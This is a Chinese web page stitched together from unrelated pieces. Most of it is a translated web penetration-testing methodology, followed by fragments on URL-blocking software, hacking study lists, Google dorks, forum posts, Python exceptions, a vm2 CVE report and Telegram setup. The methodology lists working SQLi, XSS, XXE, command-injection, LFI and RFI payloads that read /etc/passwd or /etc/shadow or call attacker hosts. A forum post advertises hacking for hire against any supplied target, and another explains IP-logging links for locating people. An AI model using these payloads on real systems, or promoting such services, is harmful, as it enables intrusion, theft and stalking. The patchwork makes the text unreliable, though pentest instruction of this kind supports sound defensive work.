192.168.100.2扫描前1000号TCP端口，OS指纹，服务，然后运行一个NSE脚本sudo nmap -A 192.168.100.2扫描全部65535个TCP端口，OS指纹，服务，然后运行一个NSE脚本sudo nmap –A –p- 192.168.100.2扫描前1000号UDP端口sudo nmap -sU 192.168.100.2扫描所有65535个UDP端口sudo nmap -sU –p- 192.168.100.2扫描所有65535个UDP端口，并获取服务、OS指纹，之后运行一些NSE脚本sudo nmap –sU -p- -A 192.168.100.2! 端口扫描通常是渗透过程中第一步和第二步的过渡部分。要非常注意暴露的端口、服务版本和OS/s！2. 浏览器代理设置2.1 Firefox工具描述Firefox跨平台的一款现代浏览器，有很多有用的插件 Firefox通常是Web渗透测试过程中的首选浏览器，这是因为它有很多有用的插件以及它的代理设置不会影响到全局代理。 2.2 Firefox插件工具描述User Agent Switcher一款可以快速切换用户代理的Firefox插件Wappalyzer可以检测各种各样的网站所用的技术和软件组件的插件FoxyProxy代理切换插件 这些插件在每次渗透测试过程中我总能用得到，我推荐你在第二步(Mapping)之前安装好它们。 2.3 配置Firefox和Burpsuit在你进行Mapping之前你一定要配置要浏览器的代理，让流量经过Burp。 在Firefox配置插件FoxyProxyIP: 127.0.0.1Port: 8080配置Firefox信任Burp的SSL证书打开http://burp/保存证书将证书导入Firefox2.4 Burp配置工具描述Burp Suit ProWeb安全测试套件 你应该配置Burp让他适合自己的喜好。但是至少我推荐你设置Scan Speed为thorough，这样你在使用扫描器时就会发出更多地请求从而扫描出更多的漏洞。 2.5 Burp扩展工具描述Burp Extender用于扩展Burp suite功能的API，可以在BApp商店获取Retire.js (BApp)用于检测版本落后的Javascript组件漏洞的Burp suite扩展Wsdler (BApp)可以解析WSDL文件，然后测试所有的允许的方法的请求Python Scripter (BApp)可以在每个HTTP请求和响应时执行一段用户定义的Python脚本 这些Burp扩展是我在渗透测试过程中经常使用的。和Firefox扩展一样，我建议你们在Mapping之前安装好它们。 它们可以使用Burp Suite Pro的Burp Extender模块来安装。 3. 人工浏览人工浏览可能是Mapping过程中最重要的部分。你有必要去浏览每个页面，点击页面上每一个跳转，这样在Burp的sitemap里面就可以出现这些请求和响应。 ！！！手工浏览对于单页应用非常非常重要。自动化的网页爬虫不能够爬到单页应用因为单页应用的HTTP请求都是用异步的AJAX来进行的。4. 自动化爬取自动化爬取是使用Burp Spider来进行的，这个过程可以发现你手工浏览没有发现的一些页面。通常来说Burp Spider会在传统的Web应用中发现更多的页面。 ！！！自动化爬虫非常危险。通常我会手工浏览80%~95%的页面，只用爬虫爬取很少的部分。因为在特定情况下爬虫很容易失效。5. 后续分析这个时候你应该使用Burp完成了Mapping这一步第一次的迭代，你应该注意目前掌握的所有信息。 5.1 需要特别注意Web 服务器Web 软件体系结构(技术栈)编程语言框架设计模式这个时候你可以注意一些需要特定页面跳转的功能点。通常这些功能点可以被手工操控，从而使其不用满足特定跳转顺序就可以实现，这可以让你有重大发现。(举个栗子，电子商务网站的付款功能，密码重置页面等) 0x03 漏洞挖掘在一次渗透测试过程中，漏洞挖掘是在攻击者的角度来了解整个Web应用的全貌。1. 过渡在你Mapping之后，并且进行了一些基本的功能性的分析后，就可以开始进行漏洞挖掘了。这个步骤中，你应该尽可能多的识别出Web应用存在的漏洞。这些漏洞不仅是The OWASP Top 10中包含的那些，还包含于应用的商业逻辑中。记住一点，你将会遇到大量的漏洞，它不属于任何一个现有的分类中，你应该时刻警惕这一点。 2. 内容挖掘2.1 漏洞扫描名称描述Nikto有指纹识别功能的Web服务漏洞扫描器 Nikto当之无愧的是最好的Web服务漏洞扫描器，特别是在大型的Web应用程序中表现非常好。它可以利用-Format选项来导出特定格式的扫描结果，使扫描结果更容易阅读和分析。 扫描目标并将结果导出成HTML格式nikto -h http://example.com -output ~/nikto.html -Format htm漏洞扫描通常是第二步和第三步的过渡。一旦有了扫描结果，一定要花时间去分析一下结果，打开一些引人注目的页面看看。3. 强制浏览(译者注：翻译的感觉很别扭，看下面内容应该能明白什么意思)名称描述Burp Engagement ToolsBurp Suite Pro中自带的有特殊用途的工具集Engagement Tool: Discover ContentBurp Suite Pro自带的用于强制浏览的工具Burp IntruderBurp Suite中可自定义的用于自动化的攻击的模块。(比如brute forcing, injection, 等)FuzzDB包含各种恶意输入、资源名、用于grep搜索响应内容的字符串、Webshell等。 强制浏览是一种挖掘技巧，它可以发现应用程序中没有被引用但是确实是可以访问的页面。Discover Content是Burp中专门用于此目的的工具。除此之外，Burp Intruder也可以通过字典攻击来实施强制浏览(通常是在url参数和文件路径部分进行修改)。FuzzDB包含一些用于此目的的非常牛逼的字典，你可以在这里看看。 3.1 测试可选内容名称描述User Agent Switcher用于迅速切换浏览器的User Agent的一款Firefox插件Burp IntruderBurp Suite中可自定义的用于自动化的攻击的模块。(比如brute forcing, injection, 等)FuzzDB包含各种恶意输入、资源名、用于grep搜索响应内容的字符串、Webshell等。 在内容挖掘这一步，我非常喜欢做一件事。那就是利用User Agent Switcher切换不同的User Agent然后访问同一个特定页面。这是因为很多的Web应用对于不同的User-Agent和Referer请求头会返回不同的内容。 我经常使用Burp Intruder来模糊测试User-Agent和Referer请求头，一般还利用FuzzDB的字典。 4. 自动化的漏洞挖掘名称描述Burp Scanner自动化扫描安全漏洞的Burp Suite工具 当你在Mapping和进行漏洞挖掘的开始部分时候，Burp Passive Scanner就已经在后台悄悄运行。你应该先分析这份扫描结果，然后再进行Burp Active Scanner，这样在Burp Passive Scanner中发现的值得关注的页面就可以在Burp Active Scanner中进行详细的扫描。 由于Burp Active Scanner完成所需的时间非常长，我更喜欢只允许一小段时间，然后查看两者之间的扫描结果并记录结果。 ！！！自动化的漏洞扫描是很危险的。用Burp Scanner可能导致不良的影响。除非你非常熟悉目标的功能与环境，否则你只应在非生产环境中使用。5. 配置5.1 默认配置在确认了目标所使用的技术后，很自然的一步跟进就是测试有没有默认配置。许多框架使用许多易受攻击默认配置的应用程序以便于向开发人员介绍他们的产品。然后由于开发人员的疏忽，这些示例应用被部署到和目标站点所在的同一台服务器上，这使得目标站点承受很大的风险。 5.2 错误配置在Web渗透测试的每一步，你都应该注意Web应用有没有错误的配置。你可以特别关注页面出现的错误信息，这些信息经常会给出很有用的数据库结构和服务器文件系统等信息。 错误信息几乎总能够发现一些。这些错误信息在注入和LFI(Local File Include)中特别有用。另外一个值得注意的是页面的敏感表单有没有禁用自动填充。比如密码字段经常会有一个“显示/隐藏”按钮。浏览器默认不会填充type="password"的input标签内容，而当密码字段是“显示”时，input标签就变成了type="text"，这样浏览器就会进行自动填充。这在多用户环境下是一个隐患。 6. 身份认证在漏洞挖掘过程中，你应该认真审视你看到的每个登录表单。如果这些表单没有做很好的安全措施(比如双重认证，验证码，禁止重复提交等)，攻击者就可能得到用户账户未授权的权限。取决于表单的不同实现以及不同的框架/CMS，即使登录失败目标站点也可能会透露出用户账户的一些信息。 如果你测试发现了上述所讨论的问题，你应该关注并记录。另外，如果登录表单没有加密(或者利用了旧版本的SSL/TLS)，这也应该关注并记录。 6.1 模糊登录测试名称描述CeWL通过爬取目标站点来生成用户字典的工具Burp IntruderBurp Suite中可自定义的用于自动化的攻击的模块。(比如brute forcing, injection, 等) 在你认真审视了登录表单后，就可以开始登录测试了。CeWL是一款非常好用的用于生成一次性字典的工具。你可以利用-h查看帮助文档。 基本语法如下 cewl [options] www.example.com当你构造好用户字典后就可以开始用Burp Intruder进行实际的模糊测试了。通常我会用两个payload集(一个是用户名的，另一个是CeWL生成的密码)。Intruder的Attack Type通常应该选Cluster Bomb。 7. Session管理Session-token/Cookie分析在渗透测试过程中虽然不是很吸引人的部分，但确实非常重要的一块。通常是这样子的，你想了解整个web应用是如何跟踪Session，然后用Burp Sequencer这样的工具去测试session token的随机性/可预测性。一些应用(较传统的应用)会把session的内容存储在客户端。有时候这些数据里面会包含有加密的，序列化的敏感信息。 这时也应该检查HTTP返回头的Set-Cookie是否包含Secure和HttpOnly的标识。如果没有的话就值得注意了，因为没有理由不设置这些标识位。 Google搜索你得到的session token，可能会有一些发现，比如Session可预测等，这样就可以进行Session劫持攻击。7.1 用Burp测试Session Tokens名称描述Burp SequencerBurp用来分析数据集的随机性的模块 Burp Sequencer是用来测试Session Token随机性和可预测性的很好的工具。当你用这个工具来测试目标的Session管理时，你应该先清除所有的Cookies，然后重新认证一次。然后就可以把带有Set-Cookie头的返回包发送给Burp Sequencer，然后Sequencer就会启动新的拦截对Token进行分析。通常10000次请求就差不多可以判断随机性和可预测性了。 如果发现Session token不够随机，那就可以考虑Session劫持了。 8. 授权授权漏洞很像功能级访问控制缺失和不安全的直接对象引用漏洞，是很长一段时间我发现的最流行的漏洞。这是因为许多的开发者没有想到一个低权限甚至是匿名用户会去向高权限的接口发送请求(失效的权限控制)。 http://example.com/app/admin_getappInfo或者是去请求其他用户的数据(不安全的直接对象引用，译者注：水平越权) http://example.com/app/accountInfo?acct=notmyacct8.1 测试权限控制名称描述Compare Site MapsBurp的用于测试授权的模块 这里有个小技巧，就是注册两个不同权限的用户，然后用高权限的用户去访问整个Web应用，退出高权限用户，登录低权限用户,然后用Burp的Compare Site Maps工具去测试哪些页面的权限控制没有做好。 9. 数据验证测试名称描述Burp Repeater用于手工修改、重放HTTP请求的Burp模块 注入漏洞的存在是因为Web应用接受任意的用户输入，并且在服务端没有正确验证用户的输入的有效性。作为一个渗透测试者，你应该注意每一个接受随意的用户输入的地方并设法进行注入。 因为每个Web应用情况都不一样，所以没有一种万能的注入方式。接下来，我会把注入漏洞进行分类并且给出一些Payload。Burp Repeater是我测试注入漏洞时最常使用的工具。它可以重放HTTP请求，并且可以随时修改Payload。 有一件事需要谨记：漏洞挖掘阶段要做的只是识别漏洞，而漏洞利用阶段才会利用漏洞做更多地事。当然，每个注入漏洞都值得被记录，你可以在漏洞挖掘阶段之后对这些注入漏洞进行深入的测试。 在每个分类下可以参照OWASP获取更多地信息。 9.1 SQLi任何将输入带入数据库进行查询的地方都可能存在SQL注入。结合错误的配置问题，会导致大量的数据被攻击者盗取。 我推荐你在做SQL注入时参照这个Wiki。如果你输入了这些Payload得到了数据库返回的错误信息，那么目标就非常有可能存在SQL注入漏洞。 Sqlmap是一款自动化的SQL注入工具，我将会在漏洞利用阶段介绍它。 OWASP-测试SQL注入) 示例' OR 1=1 -- 1 ' OR '1'='1 ' or 1=1 LIMIT 1;-- admin';-- http://www.example.com/product.php?id=10 AND 1=19.2 跨站脚本攻击(XSS)攻击者利用Web应用程序发送恶意代码(通常是JavaScript代码)给另外一个用户，就发生了XSS。 有三种不同的XSS： 存储型。当提供给Web应用的数据是攻击者事先提交到服务器端永久保存的恶意代码时，发生存储型XSS。反射型。当提供给Web应用的数据是服务端脚本利用攻击者的恶意输入生成的页面时，发生反射型XSS。DOM型。DOM型XSS存在于客户端的脚本。OWASP-测试XSS 示例<IMG SRC=javascript:alert('XSS')> "><script>alert('XSS')</script><" " onmouseover="alert('XSS') http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e9.3 XML 注入当Web应用的XML解析器没有正确的验证攻击者传入的XML文档，就会发生XML注入。 OWASP-测试XML注入) 示例Username = foo< Username = foo<!--9.4 XML实体注入(XXE)若实体的定义是一个URI，那么这个实体就叫做外部实体。除非特别配置，不然外部实体会导致XML解析器去请求这个URI。比如请求本地或远程的一个文件。 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>9.5 模板注入模板注入就是攻击者利用模板的语法注入恶意代码。 Portswigger-服务端模板注入 示例<%= 7 * 7 %> {{ 7 * 7 }}9.6 命令注入用户注入操作系统的命令到Web应用程序并被执行，就发生了命令注入。 OWASP-测试命令注入) 示例http://sensitive/cgi-bin/userData.pl?doc=/bin/ls| http://sensitive/something.php?dir=%3Bcat%20/etc/passwd Doc=Doc1.pdf+|+Dir c:\9.7 恶意重定向当应用没有检查用户可控输入时，攻击者输入了恶意的URL并被应用接受时发生。 OWASP-测试客户端恶意重定向) 示例http://www.target.site?#redirect=www.fake-target.site http://www.target.site??url=http://www.fake-target.site9.8 本地文件包含(LFI)LFI指的是Web应用允许包含本地服务器端存在的文件。 OWASP-测试本地文件包含 示例http://vulnerable_host/preview.php?file=../../../../etc/passwd http://vulnerable_host/preview.php?file=../../../../etc/passwd%009.9 远程文件包含(RFI)RFI指的是Web应用允许包含远程服务器上存在的文件。 OWASP-测试远程文件包含 示例http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page10. 逻辑漏洞想要发现逻辑漏洞，你必须对目标非常了解。只有你对目标的功能都是怎么使用有了了解后，你才能推想哪里有可利用的地方。测试逻辑漏洞时，可以回想作为普通用户是如何使用Web应用的功能的，是如何一步一步完成各种动作的，然后你要做的就是不按照这些步骤来。 此外，这时候也可以测试下输入一些不切实际的值。(比如一款健生app，用户输入自己的跑步里程)。 这时也可以测试非法文件上传。 11. 加密算法漏洞名称描述SSLyzeTLS/SSL分析工具 测试Web应用的TLS/SSL实现的质量，我推荐先去这里，如果搞不到，可以用SSLyze。 示例sslyze --regular www.example.com分析的目的可以归结为： 目标是否使用了某种形式的加密手段。目标使用的加密手段是否已经过时(TLS 1.2, SSL2/SSl3)。这时候也应该注意目标是否用了脆弱的加密算法(MD5,RC4等)，是否支持正向加密(译者注: 一次一密)等。 12. 拒绝服务拒绝服务是利用某种手段让目标无法为合法用户提供服务。拒绝服务的类型包括用户文件上传(上传巨大文件)到用户账户锁定(为了防止登录爆破)等。 如果存在载入很慢的页面或者是Ajax请求很卡，那么就意味着这个地方可能会被用于拒绝服务攻击。 13. Flash漏洞名称描述Firefox Developer ToolsFirefox浏览器自带的用于诊断、审计、调试客户端代码的工具JPEXS (FFDec)开源的SWF文件反汇编工具 如果目标使用了flash或者其他的需要编译的客户端技术(如silverlight)，那么你应该下载下来然后利用JPEXS FFDec这样的反汇编工具来审计他们的源代码。如果你成功的对他们进行了逆向工程，你可能会发现一些隐藏的漏洞。 0x04 测试Web服务Web服务用于机器之间的数据交换，他们应该用之前介绍的方法进行测试(Mapping->漏洞挖掘->漏洞利用)，可以用Burp对请求进行拦截，然后分析接口返回的数据。 1. 测试REST服务如果有文档的话，测试REST服务之前应该阅读它。当然，这通常是白盒测试或者是灰盒测试时的做法，或者你想更深入的进行测试时也可以这么做。 在黑盒测试过程中，我们可以用burp拦截请求和响应，观察JSON格式的响应信息来了解接口的作用，但是这个过程非常麻烦，不是很推荐。 因为REST使用http协议，所以我们也可以测试之前的一些漏洞比如SQLi和XSS。 测试REST服务时可以参考以下文章： https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-http://blog.isecurion.com/2017/10/10/penetration-testing-restful-web-services/https://www.owasp.org/index.php/REST_Assessment_Cheat_Sheet2. 测试SOAP服务名称描述Wsdler (BApp)可以解析WSDL文件，然后测试所有的允许的方法的请求 尽管如今我在渗透测试中观察到REST服务比SOAP服务更多，但还是应该注意它。 基于SOAP的Web服务有一点很好，就是他是通过WSDL文件自描述的。你可以用Wsdler (BApp)这样的工具来解析WSDL文件，然后用Burp Repeater来发送测试请求。 和REST一样，我们也可以测试之前的一些漏洞比如SQLi和XSS。 检查任何一个在mapping和漏洞挖掘时发现的和服务有关的路径比如，http://exampleapplication.com/service查看WSDL文件获取接口信息然后导入Burp在Burp Proxy的历史标签页，把WSDL文件通过Parse WSDL右键选项加入到Wsdler扩展发送测试请求给Repeater，观察服务如何工作测试SOAP服务时可以参考： https://blog.netspi.com/hacking-web-services-with-burp/0x05 漏洞利用在漏洞利用阶段，是利用之前发现的漏洞，评估他们影响范围与风险。简单来说，这一步就是查阅之前步骤中你所发现与记录的信息，尽可能深地利用发现的漏洞。有时在漏洞利用过程中，你可能需要更高的权限才能进行下去，这时你应该返回去，从mapping步骤开始重新迭代之前的过程。 下面是一些示例场景，但这一步是非常独特的。 1. 利用场景2. 利用XSS2.1 浏览器劫持名称描述BeEF基于web的XSS平台 如果你发现目标应用确实存在XSS漏洞，这时你可以试试是否可以用BeEF这样的工具来控制目标浏览器。 可以参考这篇。 你可以使用自己的浏览器来验证XSS漏洞的危害性当你向客户展示你发现的XSS漏洞时。 3. 利用SQLi3.1 数据提取名称描述SQLMap自动化的SQLi工具，可以检测和利用基于许多流行的关系型数据库的SQL注入漏洞 如果目标存在SQLi且为了提取数据，SQLMap是首选。 SQLMap官网有详细的教程，我推荐你仔细看看。 3.2 离线密码爆破名称描述Hashcat世界上最快最先进的密码恢复工具 当你得到目标应用账户的密码时，可以尝试这个。 如果密码用了哈希算法加密，你可以用hashcat结合一个好的字典比如rockyou.txt来恢复密码。可以看这篇。 毋庸置疑，这将是您在渗透测试结束时可以为客户带来的最大发现之一。 3.3 认证绕过你可以尝试利用SQLi来提升自己的权限。网上有很多关于此的文章，下面这些payload你可以尝试在一些脆弱的表单里输入： admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=14. 跨站请求伪造(CSRF)名称描述Burp: Generate CSRF PoC用于生成CSRF Poc的Burp模块 如果目标存在CSRF漏洞(Burp Scanner会发现)，你可以用Generate CSRF PoC来验证是否真的存在。 可以看这篇教程。 大概就下面这样： 拦截一个HTTP请求(通常是修改账户信息的)在Burp中右键Generating the CSRF PoC(修改一些请求体的信息)保存poc到一个html文件打开html文件并点击提交验证信息是否被恶意篡改0x00 结尾感谢阅读。

限制访问网站、过滤特定网址、禁止访问指定网站的方法 许多公司出于管理员工上网行为的需要，经常限制电脑访问一些网站例如游戏网站、购物网站或是视频网站等等。网上介绍了一些方法，通过windows操作系统可以实现限制网址访问，但是设置起来往往比较麻烦，对于电脑较多的公司来说并没有可行性。 相对而言，通过软件就要简单的多了，例如有一款软件叫做大势至电脑文件防泄密系统，这个软件自带的网址黑白名单功能正好是我们需要的，下面就来介绍一下具体设置方法。 首先我们在官网下载软件：http://www.grablan.com/monitorusb.html 双击安装程序开始安装软件，安装完成后，软件将自动隐藏运行，此时可以按组合键alt+F2调出软件的登录窗口，输入默认用户名admin和密码123就可以进入软件主界面了，如下图所示： 我们可以看到软件界面上有两个选项分别是：“禁止打开的网页”和“只允许打开的网页”，具体设置方法是： 设置禁止网页列表：勾选“禁止打开的网页”，点击“+/-”，在弹出的窗口中输入要禁止打开的网站名称，例如禁止访问百度，只需输入“百度”，点击“添加”，保存即可。设置“只允许打开的网页”方法相同。如下图： 设置完成后，可以打开浏览器测试一下控制效果，可以发现，当用户访问禁止网页列表中的网址时，浏览器将自动退出。这个方法是不是简单了很多呢，有兴趣的朋友可以试用一下。

成为一个黑客需要掌握哪些知识? 为了方便大家查缺补漏，避免学习过程出现知识盲点的情况，小风专门写了这篇文章，因为内容比较多，不会对某个技术做详细的讲解，只会说明该掌握哪些知识点。 一、学习前必须掌握的基础知识没有结实的地基建不了高楼，没有基础作为积淀提高不了技术，先掌握好基本知识才是王道。 1、计算机网络想要了解网络通信的原理，绕不开OSI七层协议模型、TCP/IP四层模型，有了这些网络数据才得以传输。 2、网站运行原理需要了解域名、服务器、cdn、数据库、端口、前端与后端的关系。 3、HTTP协议需要了解报文格式、状态消息（即状态码）、https加密协议、学会对数据进行抓包分析、知道cookies是干嘛的 4、语言基础html基础、php、asp、python基础、表单提交 二、主流黑客学习框架1、SQL注入了解SQL注入发生原理，熟悉掌握sqlmap工具，学会手工注入 2、暴力破解懂得利用burpsuite等软件进行暴力破解 3、XSS学会XSS三种攻击方式：反射型、存储型、dom型 4、文件上传了解文件上传漏洞产生的几种方式：IIS解析漏洞、Apache解析漏洞、PHP CGI 解析漏洞、JS本地验证绕过、MIME类型检测、服务端检测绕过、截断绕过、白名单绕过 5、文件包含本地文件包含、远程文件包含、伪协议 6、扫描学会利用工具扫描网站漏洞、扫描网站目录、扫描c段、服务器开放端口、扫描出二级域名 7、信息收集学会收集站点信息（网站语言、编码、敏感文件、架构）、服务器信息（操作系统、环境版本）、个人信息、懂得利用百度谷歌收集数据。 8、kali系统学会利用kali系统上的功能 9、代码审计 学会使用RIPS、VCG、Fortify SCA等工具检查源代码中的漏洞，学会人工代码审计 上面这些属于比较系统的，学习起来方便更好的理解漏洞

看看黑客如何使用搜索引擎 搜索引擎已经成为上网必不可少的工具之一，聪明的黑客们发现，搜索引擎也能成为发动网络攻击的工具。 Google Hacking，原指利用Google搜索引擎搜索信息来进行入侵的技术和行为，如今已不再局限于Google，泛指利用各种搜索引擎实施黑客攻击的技术和行为。 黑客们是如何使用搜索引擎，发动攻击的呢？ 在搜索引擎的搜索框内，用户键入关键词，回车后便会展示自己想要的结果。实际上，这个看似简单的搜索框，却暗藏玄机。 除了输入关键词外，搜索引擎还会提供多种语法，帮助用户提高搜索效率。 例如搜索某一本网络小说时，使用filetype语法，就能搜索到对应格式的文件。 这些可以方便用户提高搜索效率的语法，却成了黑客手中的入侵利器。他们可以利用这些语法，发现目标网站的后台管理地址、进行端口扫描、SQL注入等等。 那么，黑客是如何使用这些语法的呢？ site：在特定的网址中搜索搜索关键词时，搜索引擎展示的结果包含了所有网站，有时候这并不便捷。如果想在搜索结果只展示某一个网站的内容，可以使用site语法。例如想在微软官网搜索漏洞编号，只需在搜索引擎中键入“漏洞编号 site:Microsoft”即可。 inurl：在URL中搜索指定的内容链接inurl语法可以搜索链接的内容，对于普通用户来说，他们更关心网页内容，而不是链接的内容，这个语法意义并不大。但对于黑客来说，它却是一把利器。例如在搜索引擎中输入inurl:.php?id=或者inurl:.jsp?id=等等，可以搜索可能存在的SQL注入链接。 filetype：限定搜索的文件类型filetype可以限定搜索的文件类型，普通用户可能会使用这个语法，搜索电子书、视频、图片等资源，而在黑客眼里，filetype可以进行SQL数据库挖掘。例如：filetype:sql + "IDENTIFIED BY" -cvs intitle：搜索网页标题中包含指定内容的网页网页标题一般会表明该页面的内容，例如搜索“网络安全”，展示的结果均与网络安全有关。黑客会利用intitle语法，搜索带有“后台”、“登录”，这时候一些网站后台登录页面，便会暴露出来。 上面这些都只是基础语法，对黑客来说都只是小儿科，经验丰富的黑客，往往结合多种语法使用，例如结合inurl:和intext进行端口扫描等等。甚至还有一个网站，专门汇集了很多搜索语句，登录这个网站copy这些语句就能搜索一些平时无法被搜索到的内容。

我有个站有需求，有高手吗？

不用客气，有什么问题直接在论坛提问即可。

国内外，看你怎么选择。

如果是用国外的，就随便选个其他机器。如果针对的是国内的网友，尽量选择CN2GIA 线路的，比较快，延迟低。

https://www.thehackerworld.com/cn/index.html 点击进入即可进行沟通交流。

黑客攻防渗透入侵 您只需要提供网址/IP或程序下载地址给我们即可，我们将利用技术帮您达到想要的需求，保障您的安全。 顶尖的技术团队，均获得CEH、OSCE、OSCP、OSEE 和 OSWE证书 曾为多家银行/qp bc/大型企业/个人用户尽心多次合作都已取得很好的成绩。 对客户提供的目标进行精准的渗透，达到您提供的需求，我们的服务也是业界最好的。 公司技术人员达20+精通各渗透入侵/逆向破解/软件编程等行业，全天候24小时为您提供技术支持。

https://www.thehackerworld.com/cn/hack.html

拿met.red举例， 你创建一个key。会有一个链接 人家点击这个链接获取到的IP，就可以定位大致位置。

在 Python 中，把程序运行时产生错误的情况叫做异常。 1.1 基础简单回顾 异常类型： ''' 常见异常。 ''' AssertionError # 断言语句失败（assert 后的条件为假） NotImplementedError # 方法未实现,作为抽象的方法,不被重写则有异常; AttributeError # 访问的对象属性不存在 ImportError # 无法导入模块或者对象，主要是路径有误或名称错误,导入本地配置的时候使用 IndentationError # 代码没有正确对齐，主要是缩进错误 IndexError # 下标索引超出序列范围 IOError # 输入/输出异常，主要是无法打开文件 KeyError # 访问字典里不存在的键 NameError # 访问一个未声明的变量 OverflowError # 数值运算超出最大限制 SyntaxError # python语法错误 TabError # Tab和空格混用 TypeError # 不同类型数据之间的无效操作（传入对象类型与要求的不符合） ValueError # 传入无效的值，即使值的类型是正确的 ZeroDivisionError # 除法运算中除数0 或者 取模运算中模数为0 MemoryError # 内存溢出错误(对于Python 解释器不是致命的) 菜鸟教程中的异常列表; 异常名称 描述 BaseException 所有异常的基类 SystemExit 解释器请求退出 KeyboardInterrupt 用户中断执行(通常是输入^C) Exception 常规错误的基类 StopIteration 迭代器没有更多的值 GeneratorExit 生成器(generator)发生异常来通知退出 StandardError 所有的内建标准异常的基类 ArithmeticError 所有数值计算错误的基类 FloatingPointError 浮点计算错误 OverflowError 数值运算超出最大限制 ZeroDivisionError 除(或取模)零 (所有数据类型) AssertionError 断言语句失败 AttributeError 对象没有这个属性 EOFError 没有内建输入,到达EOF 标记 EnvironmentError 操作系统错误的基类 IOError 输入/输出操作失败 OSError 操作系统错误 WindowsError 系统调用失败 ImportError 导入模块/对象失败 LookupError 无效数据查询的基类 IndexError 序列中没有此索引(index) KeyError 映射中没有这个键 MemoryError 内存溢出错误(对于Python 解释器不是致命的) NameError 未声明/初始化对象 (没有属性) UnboundLocalError 访问未初始化的本地变量 ReferenceError 弱引用(Weak reference)试图访问已经垃圾回收了的对象 RuntimeError 一般的运行时错误 NotImplementedError 尚未实现的方法 SyntaxError Python 语法错误 IndentationError 缩进错误 TabError Tab 和空格混用 SystemError 一般的解释器系统错误 TypeError 对类型无效的操作 ValueError 传入无效的参数 UnicodeError Unicode 相关的错误 UnicodeDecodeError Unicode 解码时的错误 UnicodeEncodeError Unicode 编码时错误 UnicodeTranslateError Unicode 转换时错误 Warning 警告的基类 DeprecationWarning 关于被弃用的特征的警告 FutureWarning 关于构造将来语义会有改变的警告 OverflowWarning 旧的关于自动提升为长整型(long)的警告 PendingDeprecationWarning 关于特性将会被废弃的警告 RuntimeWarning 可疑的运行时行为(runtime behavior)的警告 SyntaxWarning 可疑的语法的警告 UserWarning 用户代码生成的警告 异常处理 try: # print(1/0) print(11) except ZeroDivisionError as e: print(e) # 出现异常执行 else: print(121) # 没有异常执行 finally: print("end")# 都执行 1.2 异常抛出 # 自主抛出 raise class Foo(object): def func(self): # 抛出的异常也可以使用 try 进行处理; raise NotImplementedError("方法需要被重写") 1.3. 断言 相关的异常类型AssertionError;通常用在方法的参数校验中,特别是机器学习的算法中，常用来校验向量的维度与类型。 语法： assert 条件判断,"异常提示" 示例： def add(x:int,y:int) -> int: assert type(x) is int and type(y) is int,"传入参数是的类型不正确" return x+y v = add(1,'二') # 报错 print(v)

vm2 JavaScript 沙盒模块中的一个现已修补的安全漏洞可能会被远程攻击者滥用，以突破安全屏障并在底层机器上执行任意操作。 GitHub在 2022 年 9 月 28 日发布的公告中表示： “威胁行为者可以绕过沙箱保护，在运行沙箱的主机上获得远程代码执行权。” 该问题的编号为 CVE-2022-36067，代号为 Sandbreak，在 CVSS 漏洞评分系统中的最高严重等级为 10。它已在2022 年 8 月 28 日发布的版本 3.9.11中得到解决。 vm2 是一个流行的 Node 库，用于运行带有被列入白名单的内置模块的不受信任的代码。它也是下载量最大的软件之一，每周下载量接近 350 万次。 据发现该漏洞的应用程序安全公司 Oxeye 称，该缺陷的根源在于 Node.js 中逃避沙箱的错误机制。 这意味着成功利用 CVE-2022-36067 可能允许攻击者绕过 vm2 沙箱环境并在托管沙箱的系统上运行 shell 命令。鉴于该漏洞的严重性，建议用户尽快更新到最新版本，以减轻可能的威胁。 “沙盒在现代应用程序中具有不同的用途，例如检查电子邮件服务器中的附件，在网络浏览器中提供额外的安全层，或者隔离某些操作系统中正在运行的应用程序，”Oxeye 说。 “鉴于沙盒用例的性质，很明显 vm2 漏洞可能会对使用 vm2 而不打补丁的应用程序产生可怕的后果。”

谢谢。

什么是 Telegram “电报“？ Telegram，中文名电报，是国内外著名的即时通讯应用APP，和微信、WhatsApp、Line都属于同类产品。但是电报最大的不同之处，就是 Telegram 的加密聊天功能和个人隐私保护功能。使用加密聊天功能，不管是一对一聊天还是群组聊天，聊天内容会被加密，不会被第三方机构或者黑客监控。 还有，你可以在电报 Telegram 上组建 “电报群”，也可以通过 ID 加入其他群组。电报群有各种各样的主题，比如科学上网，科技，政治，娱乐，区块链，金融，八卦，应用尽有。但是电报是拒绝色情类内容的，被抓到后群组会直接被封锁，非常严厉。而且，不像微信群那样，你可以直接加入电报群，不需要别人邀请。只要你搜索到这个群，或者你有这个群的ID就可以加入。你可能会看到几万人的电报大群，不像微信群那样只能有500人的人数限制。 电报APP支持移动端，电脑端，和网页端。用户可以在安卓Android，苹果iOS，Windows，苹果电脑MacOS，和各种浏览器上运行。非常强大。此外，电报还内置代理功能，不需要单独的VPN，你就可以使用电报翻墙和科学上网（仅限 Telegram 应用内）。 第一步：科学上网环境 SS设置：iOS全局模式、MacPAC自动模式 第二步：官网下载 Telegram官网是 https://www.telegramstr.com/ ，打开Telegram官网之后，可以看到安卓、iPhone/iPad、PC/Mac/Linux的客户端下载地点。 第三步：注册Telegram账号 Telegram提供了几种基本的客户端软件，本教程以Windows客户端为例进行解说。Telegram注册需要使用手机号，由于网络缘故，许多同窗大概会收不到验证码，那么继续往下看。 